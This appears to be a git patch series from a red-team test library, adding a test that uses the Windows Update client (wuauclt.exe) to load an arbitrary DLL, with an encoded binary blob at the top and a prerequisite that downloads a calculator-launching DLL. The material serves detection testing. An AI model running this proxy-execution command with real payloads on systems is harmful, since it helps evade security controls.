zhG|>!IotLxu{}g%7@N%WGF0Nlw)t&bzi3nR9vKmufE!bPPlGz-)f?0o>$got6sfy@
z+XpvFkwk+!rcQc~q;Iq}7L7Xh)NeZ-jz~=@ySuUI1$eeMs3*`F`KdPdoJ0#x7Te(u
z7lM_#vo7PXF{Pre-I2qTg>^9k7Yh5%eug8Nc#oSOu%TconmZpGikCL1!t2;j>XW0k
zhLrFE(1|?ohJXxW8)3^Qw_fHw;@pFx)laG9Y_ZOR|6UL;f?W>men2k3DUHWQgdSYM
zshuOjCSVwAhUlXBTGF^Uely(Jj`5-QL|$}^qXi<JNJO_|g(Fd|3fICWIhsErTn2>3
zcuH^s^L;cTD(59f#Sx(xBq9$%5ishr3OW}nxGN+Nmjs4iGA<_Qe{W`)@Y#H<uMcKu
z>KaL3avhxNOB#&tHO9Bg_}*cB{l@ot<J)e0ub9DKXW;wLx_!1`_|LkXzE9~VeQU9P
zp-t}(H2Y{hxO03IGx?<{w)UH|x<1g1V;9MuoRZ<D^FCK?Dn<?F8^y(+F5Y&U&b5s(
zbuErG&F$I+u-yqu55_k<8W!Fo+iDSyjPrpZbqIWf=Iivw8iBqFvt{pJVZvWp@Sp|v
zTJSF|s95lJ3pQBLW5M|r{OEGi-+LAuwcs-r%*Jz<RsJyx?z3Q4-e&2SS<qp@GnU>d
z3&t#dwFP%rFzaXUMdth6?giF6URLmb1Y10&-$@IGg59C4>+BmNEn+t#A6tZczA4Sh
za91&&)5OJ$iFD;c%F1v<WIh<zKvwfP8SbRB6D`GmfRt~w>+`NP(Q3B^KQA}7hA%Mx
zaEvvr4XqD7vi{VwKl|{Oe{Q+&-!6LiwJM7H>gzVFjZ1QT!zNkUq-=;s6LLt}AWN}m
zd;|5>hTdyxHms4lrC?k#7<i!EXjKzSKBG*b#e*2Tadn%Y-br_&V~qDxcTWUtwiD-1
z(#!JP9uM0C-nJ=TFFF^e7ox-T{^`CNC_@a5XV)r^C)BwKZ=Im?!LM4q23LsH^*|Y0
zIE#mqEa+LhCPS}eHqX#2o5gD}^u*abL$6{Mug%c&fQP19b!jv7eBkZ0foHu5(|CRY
zK{jdkz4zYRu@TK+y-Tb*%Sy=IRB!m}o5j1s@V8?oug%okIg4lN?E<fh%I&otnaj<$
z^D4=t=?#4a)zyq`HBi<E9=!=$JTLKffj6TMYKTYc;Ga<&OxtUSNAK4@fb5&L5A+!U
z^u~Cc#3ZEm>+D-Lz1_EiZM<2#JxhVIcJS!%YVnLZ5&wTnHoJ}4S6O4umCsyC0dsZa
zF;|U)xvJ-#^kH0~x~v2P@_u9*XOvzA{`L&ohVz=EI;Ulx)4`k_`OFD>XLV65YwyN@
zU4?wWvfl{2X9itxp@Usm<75}g=btQ%o!3rwXfk^oI%yo2UI$IkC}&Mhi_It}Z>k(y
zfsGYxggoEQ@@0E0w>`&W)yZQkwzJ}z0#;n@XeprfE<#8x{}br6%{T=X;TlWOmSbZ%
zh^1jG!$)a8D@A)s+wxc`+EiLy60^Ak#OEM$*#?<|bPMgQ5VFE*N6f4j+Fm0t=lr4=
zwIQ2u=g|qT#<(DUHdlbY3fY59lVCYPMyo|tM|U@CRf4i|8#pwcvS|S0h=~|;1g-QY
z@IH~T+8MkbV1L>T-j}7X%Dz0;aa%aj*eiwDw;I>n-01gK8?nXu7YM8l#A8w@+!+o9
zx`L68Zb@cr3HWiPBcN=FNr7;rGaBfS;))#I66g-c6~?Y-JyK6x0=91Tnzc8#H8nRb
zt?`&XuVJtVD~crduxqFBfW%g^KwRnybcVYj3{dBmu|Oyq=?rg5$WkB@l;!9>fuOu;
zGp<{vWjNR!zIRF_MK*`!XrxDqpyZla8qtW<8&(2JaAUW`*di8?(AtC|1!f7(M|q^j
zSTGi@?1@+26OL4dWTg`SPL*(vRN1|>a%rX6kk{;Ml<w8Rn1Z^kj^dVwKX`8v&mWE6
zorv9#h=i1IG}0JR<SmT7OOkbASxE%D*GAyBgRy@S)<(>bb~N^eq!_8+U^Jew?+C4u
z@}=ShIX6nm>Vzz#r7dzaBw;ChSZG5?!;zpOWmznh+Z4BmsC<JIq`J1qQk(+RV!t&Z
z$y-_^xic#F1S27|0<A>%Uh+lnO&x5}3~pPOECoBjWRt{g-4a)%o;C!iK8^-Rgt6}2
zCUmpeL9Koa3l0<Z=crMGv@x-1lO$(r@@2E{tHVEfr#RO6OI^>tNN3kVS_5f+`KCBK
z7R3KL{qaPg1p8VwGM%kj0RI$uH*f{;u*E0%E1W6zf`1Y)g1uh@9s_&~d%t)YWPtA?
zw*db&U|A`A04F$(+z$K{;GKA->jK^mI0tv2t-xymTal>_ZGdSD-wAlw!U>+R@V5c&
zxCfCw!3!+>V!*A)gYZf4NsCV~W8nk~aJHbj%>n#1@;=}M@54D`2k<_?y~w0P@D&R`
z33vs5Fuer+Re)W{Zv!WY`=x<D0k{}v7!Ca0fOIZ91Dqh8u}-4S1nJyFI6*q&aOe=E
zXZ$CC|NkVLaaKks`ev7pvlkeibMWy8k8#N8ocsORMh3NFWp7WnxEVJuY%z7^ORGHP
zq7(^5JHnAob>(Z@Zm6s+7vl=H_h2_R#Jch=QoMZS^~HrNg7LW2v$1=N2nUgPU3o%|
zTo(^@Nj<@MWluOHN8`~>r7{%lxh@#*soK1>T*Ouq?!;+e-OSR+)i<-gK%AqFUul+T
c-jB51le_t&Ess|0@$KPzzS0r-N;Uq!0ZzO0NdN!<

literal 0
HcmV?d00001


From 072ade0eb2fc26634dae16b6a1f7963e92b4b73e Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 21 Mar 2022 23:15:03 +0000
Subject: [PATCH 82/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1218/T1218.yaml | 1 +
 atomics/used_guids.txt   | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
index 41c43533..415a834a 100644
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -257,6 +257,7 @@ atomic_tests:
     name: powershell
     elevation_required: false
 - name: Load Arbitrary DLL via Wuauclt (Windows Update Client)
+  auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8
   description: |
     This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. 
     See https://dtm.uk/wuauclt/
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 9f881dc3..dbd64ec0 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -933,3 +933,4 @@ f650456b-bd49-4bc1-ae9d-271b5b9581e7
 66e647d1-8741-4e43-b7c1-334760c2047f
 795d3248-0394-4d4d-8e86-4e8df2a2693f
 95b25212-91a7-42ff-9613-124aca6845a8
+49fbd548-49e9-4bb7-94a6-3769613912b8

From bd96789f316f4373646000c5adb74d50a4db7424 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 21 Mar 2022 23:15:09 +0000
Subject: [PATCH 83/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 28 ++++++++++
 atomics/T1218/T1218.md                        | 53 +++++++++++++++++++
 6 files changed, 85 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 76bc5da5..335b8d69 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -601,6 +601,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compile
 defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,10,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 709431ad..a45526c2 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -420,6 +420,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compile
 defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,10,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 4471bbbd..3155f297 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -923,6 +923,7 @@
   - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
   - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
   - Atomic Test #9: DiskShadow Command Execution [windows]
+  - Atomic Test #10: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
 - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
   - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
   - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index ce47d683..670521ae 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -667,6 +667,7 @@
   - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
   - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
   - Atomic Test #9: DiskShadow Command Execution [windows]
+  - Atomic Test #10: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
 - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
   - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
   - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 9d1479f9..66fa8489 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -38283,6 +38283,34 @@ defense-evasion:
         command: "#{dspath} -S #{txt_payload} \n"
         name: powershell
         elevation_required: false
+    - name: Load Arbitrary DLL via Wuauclt (Windows Update Client)
+      auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8
+      description: "This test uses Wuauclt to load an arbitrary DLL. Upon execution
+        with the default inputs, calculator.exe will be launched. \nSee https://dtm.uk/wuauclt/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        arbitrary_dll:
+          description: Path of DLL to be loaded
+          type: String
+          default: PathToAtomicsFolder\T1218\bin\calc.dll
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'DLL to load must exist on disk as specified location (#{arbitrary_dll})
+
+'
+        prereq_command: 'if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"
+      executor:
+        command: 'wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer
+
+'
+        cleanup_command: taskkill /f /im calculator.exe > nul 2>&1
+        name: command_prompt
   T1216:
     technique:
       id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 2ff65d71..85f1e2a8 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -22,6 +22,8 @@
 
 - [Atomic Test #9 - DiskShadow Command Execution](#atomic-test-9---diskshadow-command-execution)
 
+- [Atomic Test #10 - Load Arbitrary DLL via Wuauclt (Windows Update Client)](#atomic-test-10---load-arbitrary-dll-via-wuauclt-windows-update-client)
+
 
 <br/>
 
@@ -450,4 +452,55 @@ echo "DiskShadow.exe not found on disk at expected location"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #10 - Load Arbitrary DLL via Wuauclt (Windows Update Client)
+This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. 
+See https://dtm.uk/wuauclt/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 49fbd548-49e9-4bb7-94a6-3769613912b8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| arbitrary_dll | Path of DLL to be loaded | String | PathToAtomicsFolder&#92;T1218&#92;bin&#92;calc.dll|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer
+```
+
+#### Cleanup Commands:
+```cmd
+taskkill /f /im calculator.exe > nul 2>&1
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: DLL to load must exist on disk as specified location (#{arbitrary_dll})
+##### Check Prereq Commands:
+```powershell
+if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"
+```
+
+
+
+
 <br/>